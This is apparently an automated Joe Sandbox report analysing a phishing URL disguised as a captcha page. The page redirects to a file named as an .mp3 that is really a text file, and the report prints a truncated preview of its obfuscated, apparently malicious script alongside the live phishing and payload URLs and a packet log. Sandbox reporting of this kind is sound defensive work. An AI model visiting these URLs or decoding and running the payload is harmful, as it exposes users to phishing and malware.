Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://solve.xfzz.org/awjsx.captcha?u=20d5b468-46a4-4894-abf8-dabd03b71a69

Overview

General Information

Sample URL:https://solve.xfzz.org/awjsx.captcha?u=20d5b468-46a4-4894-abf8-dabd03b71a69
Analysis ID:1592488
Infos:

Detection

Score:48
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected suspicious crossdomain redirect

Classification

  • System is w10x64
  • chrome.exe (PID: 5904 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2640 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2488 --field-trial-handle=2460,i,15508496297560318815,11468432628565422805,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6436 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://solve.xfzz.org/awjsx.captcha?u=20d5b468-46a4-4894-abf8-dabd03b71a69" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://solve.xfzz.org/awjsx.captcha?u=20d5b468-46a4-4894-abf8-dabd03b71a69Avira URL Cloud: detection malicious, Label: phishing
Source: https://u1.grapplereturnunstamped.shop/sh_UJAF3.mp3HTTP Parser: No favicon
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: solve.xfzz.org to https://u1.grapplereturnunstamped.shop/sh_ujaf3.mp3
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /awjsx.captcha?u=20d5b468-46a4-4894-abf8-dabd03b71a69 HTTP/1.1Host: solve.xfzz.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sh_UJAF3.mp3 HTTP/1.1Host: u1.grapplereturnunstamped.shopConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sh_UJAF3.mp3 HTTP/1.1Host: u1.grapplereturnunstamped.shopConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Encoding: identity;q=1, *;q=0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoReferer: https://u1.grapplereturnunstamped.shop/sh_UJAF3.mp3Accept-Language: en-US,en;q=0.9Range: bytes=0-
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: solve.xfzz.org
Source: global trafficDNS traffic detected: DNS query: u1.grapplereturnunstamped.shop
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: unknownHTTP traffic detected: POST /report/v4?s=Uetpqd6yL5kqgaix3PQi1gR%2FXNZng2n5xYYxSXQowBJV7ozSkITO8w%2BiQVC8YFNKCpvNVK7dEA06FCdXQWehWq8wDflCboh5qVRTVzOMDaruYT9oVirs28mco4vuxow9sE1aKRXfpRl%2FEDqnG0QO7V0%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 412Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: classification engineClassification label: mal48.win@17/2@8/6
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2488 --field-trial-handle=2460,i,15508496297560318815,11468432628565422805,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://solve.xfzz.org/awjsx.captcha?u=20d5b468-46a4-4894-abf8-dabd03b71a69"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2488 --field-trial-handle=2460,i,15508496297560318815,11468432628565422805,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://solve.xfzz.org/awjsx.captcha?u=20d5b468-46a4-4894-abf8-dabd03b71a69100%Avira URL Cloudphishing
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
u1.grapplereturnunstamped.shop
172.67.215.98
truefalse
    high
    a.nel.cloudflare.com
    35.190.80.1
    truefalse
      high
      www.google.com
      142.250.186.164
      truefalse
        high
        solve.xfzz.org
        104.21.32.1
        truefalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://a.nel.cloudflare.com/report/v4?s=Uetpqd6yL5kqgaix3PQi1gR%2FXNZng2n5xYYxSXQowBJV7ozSkITO8w%2BiQVC8YFNKCpvNVK7dEA06FCdXQWehWq8wDflCboh5qVRTVzOMDaruYT9oVirs28mco4vuxow9sE1aKRXfpRl%2FEDqnG0QO7V0%3Dfalse
            high
            https://solve.xfzz.org/awjsx.captcha?u=20d5b468-46a4-4894-abf8-dabd03b71a69true
              unknown
              https://u1.grapplereturnunstamped.shop/sh_UJAF3.mp3false
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                239.255.255.250
                unknownReserved
                unknownunknownfalse
                104.21.32.1
                solve.xfzz.orgUnited States
                13335CLOUDFLARENETUSfalse
                142.250.186.164
                www.google.comUnited States
                15169GOOGLEUSfalse
                172.67.215.98
                u1.grapplereturnunstamped.shopUnited States
                13335CLOUDFLARENETUSfalse
                35.190.80.1
                a.nel.cloudflare.comUnited States
                15169GOOGLEUSfalse
                IP
                192.168.2.4
                Joe Sandbox version:42.0.0 Malachite
                Analysis ID:1592488
                Start date and time:2025-01-16 08:06:18 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 3m 7s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:browseurl.jbs
                Sample URL:https://solve.xfzz.org/awjsx.captcha?u=20d5b468-46a4-4894-abf8-dabd03b71a69
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:8
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal48.win@17/2@8/6
                EGA Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 216.58.212.131, 142.250.186.142, 74.125.206.84, 216.58.206.78, 142.250.185.206, 172.217.16.206, 2.22.50.131, 2.23.77.188, 172.217.18.14, 142.250.185.238, 142.250.181.238, 142.250.186.78, 142.250.186.99, 184.28.90.27, 20.12.23.50, 13.107.246.45
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                • Not all processes where analyzed, report is missing behavior information
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: https://solve.xfzz.org/awjsx.captcha?u=20d5b468-46a4-4894-abf8-dabd03b71a69
                No simulations
                No context
                No context
                No context
                No context
                No context
                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                File Type:ASCII text, with very long lines (65536), with no line terminators
                Category:downloaded
                Size (bytes):537548
                Entropy (8bit):5.339127082529876
                Encrypted:false
                SSDEEP:12288:aL79s4zcG0gsUbuLcM/xIZRK8Kz72KhKQ:2N89NP74Q
                MD5:3132C2EDD46F7894523B2724EF976EF7
                SHA1:E2A4E91A218697D1BCE9ABA95F187D6A7EFF5E98
                SHA-256:850D9808FF2FD3D7420FBB6F4B66F59831ED791899C39838CB1CA3D7A52ED7C5
                SHA-512:118153C6346962B568A970C082104EAD778666646580D4EE2C4229890B37FACDB1D4244BDF6C5D45284A57367FBA9A36232754C6D6F8BB6DAED9E6545ECD759C
                Malicious:false
                Reputation:low
                URL:https://u1.grapplereturnunstamped.shop/sh_UJAF3.mp3:2f8a63bb4e2de9:0
                Preview:66o75S6ee63d74l69T6fq6ek20d74l55w77L6cA7ad54n28G63g61H4fB69f29z7bp76s61I72I20c56X4dc6aK5aR6bC7aG3db20q27h27u3bF66v6fy72g20Y28j76U61L72i20v4fc55x78b77c66W48l20d3dt20d30z3ba4fV55U78I77w66N48a20L3ci20q63j61J4fv69t2eB6ck65J6eV67H74P68V3bh20Z4fM55z78a77B66i48v2bR2bc29i7bN76i61T72j20a44q74k66K59J63I20c3dr20L53S74B72i69b6el67c2eI66m72N6fd6dt43w68I61I72W43M6fs64Q65Q28N63B61v4fN69Z5bR4fJ55S78l77w66G48M5dE20h2dA20h32Y32T35H29J3bp56U4dw6aA5aE6ba7an20S3dh20N56y4dR6ar5aL6bd7aJ20W2bo20I44J74c66J59X63p7dG72R65o74O75H72b6ex20s56l4dH6ab5at6bF7av7dI3bz76e61r72l20X56y4dp6aU5at6bD7aq20K3dk20L74x55h77g6cw7aG54t28n5bl33Y33K37F2cQ33F33g36k2ck33j34E34b2cg33J32f36k2cX33A33q39R2cw33u34K30R2cR33N32h39n2cZ33u32x36y2cC33U33N33F2cg33g33G33t2cI32k37J31T2cm33i32D36B2cS33w34J35w2cQ33b32r36q2cO32t35n37C2cY32s37L30p2cm33F34Z34L2cv32Z35E37q2ct32x37I34M2cl32q35e37i2cJ32f37V30d2cl32A39i34a2cd33W33q35m2ct33E32V34Q2cY32U35h37g2cJ32s39G39s2cs32S39D30T2cS32e39F30X2cP32E37t38s2cX32h39D30l2cX32y39h37Y2ci33R31x34p2cc32s39n30R2cJ3
                No static file info
                TimestampSource PortDest PortSource IPDest IP
                Jan 16, 2025 08:07:22.511584997 CET49675443192.168.2.4173.222.162.32
                Jan 16, 2025 08:07:27.177046061 CET49737443192.168.2.4142.250.186.164
                Jan 16, 2025 08:07:27.177083969 CET44349737142.250.186.164192.168.2.4
                Jan 16, 2025 08:07:27.177293062 CET49737443192.168.2.4142.250.186.164
                Jan 16, 2025 08:07:27.177484989 CET49737443192.168.2.4142.250.186.164
                Jan 16, 2025 08:07:27.177493095 CET44349737142.250.186.164192.168.2.4
                Jan 16, 2025 08:07:27.847222090 CET44349737142.250.186.164192.168.2.4
                Jan 16, 2025 08:07:27.849020958 CET49737443192.168.2.4142.250.186.164
                Jan 16, 2025 08:07:27.849037886 CET44349737142.250.186.164192.168.2.4
                Jan 16, 2025 08:07:27.850681067 CET44349737142.250.186.164192.168.2.4
                Jan 16, 2025 08:07:27.850771904 CET49737443192.168.2.4142.250.186.164
                Jan 16, 2025 08:07:27.852324963 CET49737443192.168.2.4142.250.186.164
                Jan 16, 2025 08:07:27.852478981 CET44349737142.250.186.164192.168.2.4
                Jan 16, 2025 08:07:27.901607990 CET49737443192.168.2.4142.250.186.164
                Jan 16, 2025 08:07:27.901637077 CET44349737142.250.186.164192.168.2.4
                Jan 16, 2025 08:07:27.948354006 CET49737443192.168.2.4142.250.186.164
                Jan 16, 2025 08:07:29.366543055 CET49740443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:29.366638899 CET44349740104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:29.366729975 CET49740443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:29.366899967 CET49741443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:29.366945028 CET44349741104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:29.367042065 CET49741443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:29.367433071 CET49740443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:29.367511988 CET44349740104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:29.367600918 CET49741443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:29.367620945 CET44349741104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:29.851474047 CET44349741104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:29.851901054 CET49741443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:29.851948023 CET44349741104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:29.853625059 CET44349741104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:29.853701115 CET49741443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:29.855624914 CET44349740104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:29.862626076 CET49740443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:29.862689972 CET44349740104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:29.864237070 CET49741443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:29.864283085 CET49741443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:29.864348888 CET49741443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:29.864382029 CET44349740104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:29.864576101 CET49740443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:29.864583969 CET44349741104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:29.864655018 CET49741443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:29.864674091 CET49742443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:29.864746094 CET44349742104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:29.864835024 CET49742443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:29.865381956 CET49742443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:29.865417004 CET44349742104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:29.865473986 CET49740443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:29.865473986 CET49740443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:29.865521908 CET49740443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:29.865681887 CET49743443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:29.865751028 CET44349743104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:29.865758896 CET44349740104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:29.865820885 CET49743443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:29.865847111 CET49740443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:29.866020918 CET49743443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:29.866034985 CET44349743104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:30.336189985 CET44349742104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:30.336510897 CET49742443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:30.336577892 CET44349742104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:30.338229895 CET44349742104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:30.338315010 CET49742443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:30.339807987 CET49742443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:30.339904070 CET44349742104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:30.340058088 CET49742443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:30.340076923 CET44349742104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:30.352762938 CET44349743104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:30.355021954 CET49743443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:30.355048895 CET44349743104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:30.358609915 CET44349743104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:30.358688116 CET49743443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:30.359005928 CET49743443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:30.359186888 CET44349743104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:30.389799118 CET49742443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:30.401371956 CET49743443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:30.401395082 CET44349743104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:30.448812008 CET49743443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:32.671979904 CET44349742104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:32.672192097 CET44349742104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:32.672440052 CET49742443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:32.672962904 CET49742443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:32.672962904 CET49742443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:32.673032045 CET44349742104.21.32.1192.168.2.4
                Jan 16, 2025 08:07:32.673105001 CET49742443192.168.2.4104.21.32.1
                Jan 16, 2025 08:07:32.688364983 CET49744443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:32.688417912 CET44349744172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:32.688607931 CET49744443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:32.688935041 CET49744443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:32.689011097 CET44349744172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:33.159924984 CET44349744172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:33.160440922 CET49744443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:33.160476923 CET44349744172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:33.161921978 CET44349744172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:33.162009001 CET49744443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:33.162708044 CET49744443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:33.162800074 CET44349744172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:33.164154053 CET49744443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:33.164175987 CET44349744172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:33.164227009 CET49744443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:33.164256096 CET49744443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:33.164802074 CET49745443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:33.164846897 CET44349745172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:33.164911985 CET49745443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:33.165204048 CET49745443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:33.165219069 CET44349745172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:33.657301903 CET44349745172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:33.657584906 CET49745443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:33.657599926 CET44349745172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:33.659240007 CET44349745172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:33.659307957 CET49745443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:33.660408020 CET49745443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:33.660490036 CET44349745172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:33.660578966 CET49745443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:33.660584927 CET44349745172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:33.700768948 CET49745443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:33.955840111 CET44349745172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:33.955957890 CET44349745172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:33.956017971 CET49745443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:33.956038952 CET44349745172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:33.956118107 CET44349745172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:33.956157923 CET49745443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:33.956162930 CET44349745172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:33.956223965 CET44349745172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:33.956264973 CET49745443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:33.956269026 CET44349745172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:33.956341982 CET44349745172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:33.956392050 CET49745443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:33.956397057 CET44349745172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:33.960535049 CET44349745172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:33.960612059 CET49745443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:33.960613966 CET44349745172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:33.960642099 CET44349745172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:33.960685015 CET49745443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:33.960730076 CET44349745172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:34.005498886 CET49745443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:34.014517069 CET49745443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:34.014647961 CET44349745172.67.215.98192.168.2.4
                Jan 16, 2025 08:07:34.014728069 CET49745443192.168.2.4172.67.215.98
                Jan 16, 2025 08:07:34.023844004 CET49746443192.168.2.435.190.80.1
                Jan 16, 2025 08:07:34.023879051 CET4434974635.190.80.1192.168.2.4
                Jan 16, 2025 08:07:34.023942947 CET49746443192.168.2.435.190.80.1
                Jan 16, 2025 08:07:34.025036097 CET49746443192.168.2.435.190.80.1
                Jan 16, 2025 08:07:34.025051117 CET4434974635.190.80.1192.168.2.4
